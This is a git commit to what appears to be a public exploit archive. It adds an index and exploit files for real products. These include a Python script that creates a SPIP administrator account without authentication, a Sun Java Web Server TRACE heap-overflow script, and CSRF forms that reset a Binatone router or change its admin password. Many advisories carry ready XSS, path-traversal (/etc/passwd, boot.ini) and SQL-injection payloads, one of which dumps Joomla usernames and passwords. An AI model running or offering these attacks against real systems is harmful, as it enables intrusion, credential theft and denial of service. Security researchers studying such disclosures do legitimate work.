From 3a4999409ac978e40a1ba2d858532ecd646c61f4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 23 May 2014 04:36:15 +0000 Subject: [PATCH] Updated 05_23_2014 --- files.csv | 24 +++ platforms/hardware/remote/33471.txt | 9 + platforms/hardware/webapps/33455.txt | 104 ++++++++++++ platforms/multiple/dos/33472.py | 54 ++++++ platforms/php/webapps/33425.py | 70 ++++++++ platforms/php/webapps/33456.txt | 10 ++ platforms/php/webapps/33457.txt | 10 ++ platforms/php/webapps/33458.txt | 9 + platforms/php/webapps/33459.txt | 12 ++ platforms/php/webapps/33460.txt | 9 + platforms/php/webapps/33461.txt | 9 + platforms/php/webapps/33462.txt | 10 ++ platforms/php/webapps/33463.txt | 9 + platforms/php/webapps/33464.txt | 11 ++ platforms/php/webapps/33465.txt | 9 + platforms/php/webapps/33466.txt | 9 + platforms/php/webapps/33467.txt | 7 + platforms/php/webapps/33468.txt | 9 + platforms/php/webapps/33469.txt | 9 + platforms/php/webapps/33470.txt | 15 ++ platforms/php/webapps/33473.txt | 7 + platforms/php/webapps/33474.txt | 7 + platforms/php/webapps/33475.txt | 235 +++++++++++++++++++++++++++ platforms/windows/remote/33453.py | 90 ++++++++++ platforms/windows/remote/33454.py | 117 +++++++++++++ 25 files changed, 864 insertions(+) create mode 100755 platforms/hardware/remote/33471.txt create mode 100755 platforms/hardware/webapps/33455.txt create mode 100755 platforms/multiple/dos/33472.py create mode 100755 platforms/php/webapps/33425.py create mode 100755 platforms/php/webapps/33456.txt create mode 100755 platforms/php/webapps/33457.txt create mode 100755 platforms/php/webapps/33458.txt create mode 100755 platforms/php/webapps/33459.txt create mode 100755 platforms/php/webapps/33460.txt create mode 100755 platforms/php/webapps/33461.txt create mode 100755 platforms/php/webapps/33462.txt create mode 100755 platforms/php/webapps/33463.txt create mode 100755 platforms/php/webapps/33464.txt create mode 100755 platforms/php/webapps/33465.txt create mode 100755 platforms/php/webapps/33466.txt create mode 100755 platforms/php/webapps/33467.txt create mode 100755 platforms/php/webapps/33468.txt create mode 100755 platforms/php/webapps/33469.txt create mode 100755 platforms/php/webapps/33470.txt create mode 100755 platforms/php/webapps/33473.txt create mode 100755 platforms/php/webapps/33474.txt create mode 100755 platforms/php/webapps/33475.txt create mode 100755 platforms/windows/remote/33453.py create mode 100755 platforms/windows/remote/33454.py diff --git a/files.csv b/files.csv index e121437e0..322710d99 100755 --- a/files.csv +++ b/files.csv @@ -30111,6 +30111,7 @@ id,file,description,date,author,platform,type,port 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 +33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 @@ -30135,3 +30136,26 @@ id,file,description,date,author,platform,type,port 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 +33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 +33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 +33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 +33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 'SERVER' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 Cross Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 'referer' Parameter Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 +33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 Cross Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 +33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 'stop' Parameter Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 +33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33467,platforms/php/webapps/33467.txt,"WMNews 'admin/wmnews.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33469,platforms/php/webapps/33469.txt,"LXR 0.9.x Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 +33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 +33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 'auth.asp' Cross Site Scripting Vulnerability",2010-01-06,POPCORN,hardware,remote,0 +33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow Vulnerability",2010-01-06,"Evgeny Legerov",multiple,dos,0 +33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0 +33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0 +33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 diff --git a/platforms/hardware/remote/33471.txt b/platforms/hardware/remote/33471.txt new file mode 100755 index 000000000..c3dc72e30 --- /dev/null +++ b/platforms/hardware/remote/33471.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37646/info + +D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example data is available: + +The POST variable nickname has been set to 1>">"> \ No newline at end of file diff --git a/platforms/hardware/webapps/33455.txt b/platforms/hardware/webapps/33455.txt new file mode 100755 index 000000000..ab28361c7 --- /dev/null +++ b/platforms/hardware/webapps/33455.txt @@ -0,0 +1,104 @@ +# Exploit Title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities +# Date: 05/20/2014 +# Author: Samandeep Singh - SaMaN( @samanL33T ) +# Vendor Homepage:http://www.binatonetelecom.in/4port-adsl2-wifi-router1.html +# Category: Hardware/Wireless Router +# Firmware Version: T6W-A1.005 and below +# Tested on: Binatone DT 850W Wireless Router +# Patch/ Fix: Vendor has not provided any fix for this yet +--------------------------------------------------- + +Disclosure Timeline +~~~~~~~~~~~~~~~~~~~ +04/23/2014 Contacted Vendor +04/26/2014 Vendor Replied +04/26/2014 Vulnerability Explained (No reply received) +05/04/2014 Vendor notified about full disclosure in 15 days (No reply) +05/20/2014 Full Disclosure + +Technical Details +~~~~~~~~~~~~~~~~~~ +Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password, SSId of Wireless network,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link. + +Exploit Code +~~~~~~~~~~~~~ + +Change Wifi (WPA2/PSK) password & SSID by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +Factory Reset Router Settings by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ +
+ + + + +Change Router's Admin Password by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ + +
+ + + + +Restart Router by CSRF +~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ +
+ + + + +-- +SaMaN +twitter : @samanL33T \ No newline at end of file diff --git a/platforms/multiple/dos/33472.py b/platforms/multiple/dos/33472.py new file mode 100755 index 000000000..7be22e308 --- /dev/null +++ b/platforms/multiple/dos/33472.py @@ -0,0 +1,54 @@ +source: http://www.securityfocus.com/bid/37648/info + +Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. + +Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks. + +The following are vulnerable: + +Sun Java System Web Server 7.0 prior to 7.0 Update 8 +Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12 +Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13 + +#!/usr/bin/env python +# sun_trace.py +# +# Use this code at your own risk. Never run it against a production system. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +import socket +import sys + +def send_req(host,port): + buf="TRACE /%s HTTP/1.0\n" % ("A"*4074) + for i in range(0,10): + buf += "%d"%i + ":\n" + + for i in range(ord('a'), ord('z')): + buf += chr(i) + ":\n" + + buf += "\n" + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((host,port)) + sock.sendall(buf) + resp="" + while 1: + s= sock.recv(4000) + if len(s)<1: break + resp+=s + print list(resp) + +if __name__=="__main__": + if len(sys.argv)<3: + print "usage: %s host port" % sys.argv[0] + sys.exit() + + send_req(sys.argv[1],int(sys.argv[2])) diff --git a/platforms/php/webapps/33425.py b/platforms/php/webapps/33425.py new file mode 100755 index 000000000..e4c9ce073 --- /dev/null +++ b/platforms/php/webapps/33425.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python +# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user +# Date: 04/30/2014 +# Flaw finder : Unknown +# Exploit Author: Gregory DRAPERI +# Email: gregory |dot| draperi |at| gmail |dot| com +# Google Dork : inurl="spip.php" +# Vendor Homepage: www.spip.net +# Software Link: http://files.spip.org/spip/archives/ +# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23 +# Tested on: Windows 7 - SPIP 2.2.21 +# CVE : CVE-2013-2118 +''' +--------------------------------------------------------------------------------------------------------- +Software Description: +SPIP is a free software content management system +--------------------------------------------------------------------------------------------------------- +Vulnerability Details: +This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated. +To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail. + +''' +import urllib, urllib2 +import cookielib +import sys +import re + +def send_request(urlOpener, url, post_data=None): + request = urllib2.Request(url) + url = urlOpener.open(request, post_data) + return url.read() + +if len(sys.argv) < 4: + print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py " + exit() + +base_url = sys.argv[1] +login = sys.argv[2] +mail = sys.argv[3] + +cookiejar = cookielib.CookieJar() +urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) + + +formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo") +print "[+] First request sended..." + + +m = re.search("]*", formulaire) +m = re.search("(?<=value=')[\w\+/=]*",m.group(0)); + + +formulaire_data = {'var_ajax' : 'form', + 'page' : 'identifiants', + 'mode' : '0minirezo', + 'formulaire_action' : 'inscription', + 'formulaire_action_args' : m.group(0), + 'nom_inscription' : login, + 'mail_inscription' : mail, + 'nobot' : '' + } +formulaire_data = urllib.urlencode(formulaire_data) + + +send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data) +print "[+] Second request sended" + + +print "[+] You should receive an email with credentials soon :) " + diff --git a/platforms/php/webapps/33456.txt b/platforms/php/webapps/33456.txt new file mode 100755 index 000000000..65cb42290 --- /dev/null +++ b/platforms/php/webapps/33456.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37558/info + +Stardevelop Live Help is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Live Help 2.6.0 is vulnerable; other versions (or products that include Live Help) may also be affected. + +http://www.example.com/livehelp/index_offline.php?SERVER=>">alert(213771818860)%3B +http://www.example.com/livehelp/frames.php?SERVER=>">alert(213771818860)%3B&URL=www.example.org&SESSION=indoushka@example.org diff --git a/platforms/php/webapps/33457.txt b/platforms/php/webapps/33457.txt new file mode 100755 index 000000000..ac025a5c3 --- /dev/null +++ b/platforms/php/webapps/33457.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37559/info + +Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. The attacker may also execute script code in an unsuspecting user's browser or steal cookie-based authentication credentials. Other attacks are also possible. + +Photokorn 1.542 is vulnerable; other versions may also be affected. + +http://www.example.com/sm-p1542/install.php?lang=>">alert(213771818860)%3B +http://www.example.com/sm-p1542/index.php?lg=http://www.example.net/c.txt? diff --git a/platforms/php/webapps/33458.txt b/platforms/php/webapps/33458.txt new file mode 100755 index 000000000..fd3b5e5c4 --- /dev/null +++ b/platforms/php/webapps/33458.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37562/info + +Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Discuz! 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'>alert(213771818860)%3B \ No newline at end of file diff --git a/platforms/php/webapps/33459.txt b/platforms/php/webapps/33459.txt new file mode 100755 index 000000000..73c794277 --- /dev/null +++ b/platforms/php/webapps/33459.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37564/info + +DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker could exploit these vulnerabilities to obtain sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. + +DieselPay 1.6 is vulnerable; other versions may also be affected. + +The following example URIs are available: + +http://www.example.com/dieselpay/index.php?read=alert(213771818860)%3B +http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/33460.txt b/platforms/php/webapps/33460.txt new file mode 100755 index 000000000..a0382674a --- /dev/null +++ b/platforms/php/webapps/33460.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37566/info + +Magic News Plus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Magic News Plus 1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php/>[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33461.txt b/platforms/php/webapps/33461.txt new file mode 100755 index 000000000..c8895a92d --- /dev/null +++ b/platforms/php/webapps/33461.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37567/info + +PHPCart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +PHPCart 3.1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/search.php?action=submit&order_id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33462.txt b/platforms/php/webapps/33462.txt new file mode 100755 index 000000000..ec8f39f06 --- /dev/null +++ b/platforms/php/webapps/33462.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37568/info + + +VirtuaNews Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +VirtuaNews Pro 1.0.4 is vulnerable; other versions may also be affected. + +http://www.example.com/upload/admin.php?username=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33463.txt b/platforms/php/webapps/33463.txt new file mode 100755 index 000000000..f7bdbbd3f --- /dev/null +++ b/platforms/php/webapps/33463.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37569/info + +VisionGate is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +VisionGate 1.6 is vulnerable; other versions may also be affected. + +http://www.example.com/login.php?url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33464.txt b/platforms/php/webapps/33464.txt new file mode 100755 index 000000000..d01ea4a69 --- /dev/null +++ b/platforms/php/webapps/33464.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37573/info + +Discuz! is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Discuz! 2.0 is vulnerable; other versions may also be affected. + + +http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>">alert(213771818860)%3B&page=1 +http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>">alert(213771818860)%3B \ No newline at end of file diff --git a/platforms/php/webapps/33465.txt b/platforms/php/webapps/33465.txt new file mode 100755 index 000000000..310b4d6bb --- /dev/null +++ b/platforms/php/webapps/33465.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37574/info + +SLAED CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +SLAED CMS 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?name=Recommend&stop= \ No newline at end of file diff --git a/platforms/php/webapps/33466.txt b/platforms/php/webapps/33466.txt new file mode 100755 index 000000000..1cd4eae15 --- /dev/null +++ b/platforms/php/webapps/33466.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37593/info + +pL-PHP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +pL-PHP 0.9 beta is vulnerable; other versions may also be affected. + +http://www.example.com/files/index.php/>"> diff --git a/platforms/php/webapps/33467.txt b/platforms/php/webapps/33467.txt new file mode 100755 index 000000000..0bbe38da0 --- /dev/null +++ b/platforms/php/webapps/33467.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37600/info + +WMNews is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wmnews/admin/wmnews.php/>"> diff --git a/platforms/php/webapps/33468.txt b/platforms/php/webapps/33468.txt new file mode 100755 index 000000000..18f34f8f2 --- /dev/null +++ b/platforms/php/webapps/33468.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37605/info + +MercuryBoard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +MercuryBoard 1.1.5 is vulnerable; other versions may also be affected. + +http://www.example.com/mercuryboard-1.1.5/index.php/>'> \ No newline at end of file diff --git a/platforms/php/webapps/33469.txt b/platforms/php/webapps/33469.txt new file mode 100755 index 000000000..420dac196 --- /dev/null +++ b/platforms/php/webapps/33469.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37612/info + +LXR Cross Referencer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LXR Cross Referencer 0.9.5 and 0.9.6 are affected; other versions may also be vulnerable. + +http://www.example.com/lxr/ident?i= \ No newline at end of file diff --git a/platforms/php/webapps/33470.txt b/platforms/php/webapps/33470.txt new file mode 100755 index 000000000..d0108c534 --- /dev/null +++ b/platforms/php/webapps/33470.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/37613/info + +LineWeb is prone to multiple remote vulnerabilities: + +- Multiple local file-include vulnerabilities +- An SQL-injection vulnerability +- A security-bypass vulnerability + +An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +LineWeb 1.0.5 is vulnerable; other versions may also be affected. + +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00 +http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00 +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 \ No newline at end of file diff --git a/platforms/php/webapps/33473.txt b/platforms/php/webapps/33473.txt new file mode 100755 index 000000000..ac28ad9e3 --- /dev/null +++ b/platforms/php/webapps/33473.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37654/info + +RoundCube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123 \ No newline at end of file diff --git a/platforms/php/webapps/33474.txt b/platforms/php/webapps/33474.txt new file mode 100755 index 000000000..6d5e97748 --- /dev/null +++ b/platforms/php/webapps/33474.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37655/info + +The DM Orders component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/33475.txt b/platforms/php/webapps/33475.txt new file mode 100755 index 000000000..fd306d7d4 --- /dev/null +++ b/platforms/php/webapps/33475.txt @@ -0,0 +1,235 @@ +source: http://www.securityfocus.com/bid/37669/info + +dotProject is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks. + +The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +dotProject 2.1.3 is vulnerable; other versions may also be affected. + + +== Company === +The company creation screen fails to filter form details before creating +a new company. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new company +2. Click the 'Companies' link in the top navigation bar +3. Click the 'new company' button in the upper right +4. Fill in "" for each field except for +phone, phone2, and fax. These fields restrict the input size so simply +put "" in these fields. +5. Click the 'submit' button in the lower right hand corner +6. On the resulting screen the company name XSS will appear. +7. To view the other company XSS attacks browse to +index.php?m=companies&a=view&company_id=X where 'X' is the id of the new +company. Alternatively you can click on the 'Projects' link in the top +navigation then the 'new project' button in the upper right. Create a +new project, selecting the newly created company, which will appear as a +blank choice in the company drop down list. Save the project and then +in the project list click on the company name. + +Impact +Any user with the permissions to create new companies can expose other +users of dotProject to XSS attacks. + +== Project === +The project creation screen fails to filter form details before creating +a new project. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new project +2. Click the 'Projects' link in the top navigation bar +3. Click the 'new project' button in the upper right +4. Fill in "" for the 'Project Name', +'URL', 'Starting URL', and 'Description' fields +5. Click the 'submit' button in the lower right hand corner +6. On the resulting screen the project name XSS will appear. +7. To view the other project XSS attacks browse to +index.php?m=projects&a=view&project_id=X where 'X' is the id of the new +project. + +Impact +Any user with the permissions to create new projects can expose other +users of dotProject to XSS attacks. + +== Task === +The task creation screen fails to filter form details before creating a +new task. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a task +2. Click the 'Projects' link in the top navigation bar +3. Click on a project name to which the user account has permissions +4. Click the 'new task' button in the upper right +5. Fill in "" for the 'Task Name', 'Web +Address', 'Description', and 'Description' fields +6. Click on the 'Dates' tab and select an appropriate date +7. Click the 'save' button in the lower right hand corner +8. On the resulting screen the task name XSS will appear. +9. To view the other task summary XSS attacks browse to +index.php?m=tasks&a=view&task_id=X where 'X' is the id of the new task. + +Impact +Any user with the permissions to create new tasks can expose other users +of dotProject to XSS attacks. + +== Task Log === +The task log creation screen fails to filter form details before +creating a new task log. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a task +2. Click the 'Tasks' link in the top navigation bar +3. Click on a task name to which the user account has permissions +4. Click the 'New Log' tab +5. Fill in "" for the 'Summary', and +'Description' fields, enter "">" for +the 'URL' field +6. Click the 'update task' button in the lower right hand corner +7. On the resulting screen the task name XSS will appear. +8. To view the other task log XSS attacks browse to +index.php?m=tasks&a=view&task_id=X where 'X' is the id of the task. + +Impact +Any user with the permissions to create new task logs (virtually all +dotProject users) can expose other users of dotProject to XSS attacks. + +== Files === +The file attachment screen fails to filter form details before creating +a new file attachment. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a file +2. Click the 'Files' link in the top navigation bar +3. Click on a 'new folder' button in the upper right +4. Fill in "" for the 'Folder Name', and +'Description' fields +5. Click on the 'new file' button in the upper right +6. Observer the 'Folder name' XSS +7. Fill in "" for the 'Description' field +and choose a file to upload +8. Click the 'submit' button in the lower right hand corner +9. On the resulting screen the file description XSS will appear. + +Impact +Any user with the permissions to create new files can expose other users +of dotProject to XSS attacks. + +== Events === +The events screen fails to filter form details before creating a new events. + +Proof of Concept +1. Log into dotProject as a user with privileges to create an event +2. Select 'Event' from the '-New Item-' drop down in the upper right or +navigate to index.php?m=calendar&a=addedit +3. Fill in "" for the 'Event Title', and +'Description' fields +4. Click on the 'submit' button in the lower right +5. Observe the XSS at the View Event screen +index.php?m=calendar&a=view&event_id=X where 